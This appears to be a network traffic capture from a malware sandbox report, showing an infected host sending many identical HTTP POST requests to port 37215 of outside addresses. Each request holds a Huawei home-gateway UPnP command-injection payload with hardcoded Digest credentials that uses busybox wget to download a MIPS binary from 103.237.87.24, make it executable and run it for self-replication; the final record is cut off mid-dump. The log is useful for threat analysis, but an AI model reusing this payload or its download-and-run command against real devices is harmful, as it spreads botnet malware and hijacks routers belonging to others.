                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2497192.168.2.133959641.246.52.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635979891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2498192.168.2.1355562197.36.184.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636010885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2499192.168.2.1353900157.39.30.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636015892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2500192.168.2.1336772123.17.96.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636233091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2501192.168.2.1345640176.2.96.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636254072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2502192.168.2.1347198197.73.178.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636542082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2503192.168.2.1340910157.197.192.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636542082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2504192.168.2.133906641.150.108.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636570930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2505192.168.2.1358232177.36.62.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636620998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2506192.168.2.134635841.67.64.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.636620998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 